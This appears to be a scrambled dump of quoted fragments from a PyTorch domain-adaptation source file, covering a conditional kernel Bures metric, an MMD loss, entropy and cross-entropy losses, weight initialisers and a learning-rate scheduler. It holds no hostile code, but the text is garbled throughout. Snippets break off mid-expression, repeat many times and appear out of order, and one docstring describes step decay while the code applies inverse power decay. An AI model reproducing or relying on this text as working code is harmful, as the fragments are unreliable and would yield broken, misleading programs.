prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\", "Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st}", "G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #======", "D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp()", "Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') !=", "D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach()", "= prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #======", "a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 +", "1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy", "= D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs =", "R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t):", "= num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize", "#====== Kernel Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s", "return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X, lab)", "torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\", "lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma * iter_num) ** (-power)", "U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n", "2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions", "D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable", "K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt", "iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1", "################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname =", "G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #======", "elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if", "param_group['weight_decay'] = weight_decay * 2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler}", "\"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x):", "= (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs =", "B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt", "D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean()", "conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if", "= fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t())", "= D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist =", "!= -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def", "= prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt", "Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss #", "- 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0]", "elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s =", "D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ##################################", "or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02)", "lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional", "num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach()", "prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() /", "0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _,", "R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s", "D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp()", "torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1:", "= prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t())", "def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1:", "+= 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## #", "G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s =", "+\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs =", "epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) #", "prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs", "sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist", "lr = init_lr * (1 + gamma * iter_num) ** (-power) i =", "def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a", "elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if", "variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with", "def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x)", "fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt", "symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True)", "D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\", "= prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def", "prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt =", "2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "# MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs", "(-power) i = 0 for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i]", "torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "# -*- coding: utf-8 -*- import torch from torch.autograd import Variable import sys", "Kernel Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda()", "CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda()", "param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2", "prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t)", "= OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t())", "= correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001,", "= epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s -", "== 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else:", "0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0,", "return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2,", "- (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2", "(-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean() -", "_, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item()", "(-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t)", "H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n,", "################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1:", "CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea,", "plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy", "classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1:", "I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix =======", "gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1 every", "plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma,", "R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s - (G_Ys -", "= D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt =", "num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t", "= D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs =", "D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\", "rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr *", "* iter_num) ** (-power) i = 0 for param_group in optimizer.param_groups: param_group['lr'] =", "(epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t =", "CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0]", "epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s - (G_Ys", "= weight_decay * 2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ##################################", "* param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1 return optimizer schedule_dict", "= 0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze()", "prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s)", "= prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t())", "fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs =", "* 2 i += 1 return optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective", "I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon)", "= prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs", "weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight)", "m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1:", "m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02)", "lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1 return optimizer", "optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i +=", "init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\"", "torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs =", "prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel", "-1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear')", "num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s,", "(-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t)", "def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "= init_lr * (1 + gamma * iter_num) ** (-power) i = 0", "= H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n,", "enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1]", "# Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam", "factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma", "= (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t", "torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def", "MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs =", "weight_decay=0.0005): \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr", "torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0", "(G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 #", "= (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} =======", "( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs", "classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx, (X, lab) in enumerate(data_loader): X,", "prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution P(Z|Y)", "prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid", "sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs", "variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to", "+ G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t)", "num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t())", "S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace()", "(H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and", "fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching", "+ B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True)", "Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB", "= I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s", "label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0]", "= R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s,", "Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss", "# Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return", "num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard':", "HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear)", "& Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv')", "torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if", "batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob =", "= 0 for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] =", "= D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt =", "sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs", "+\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 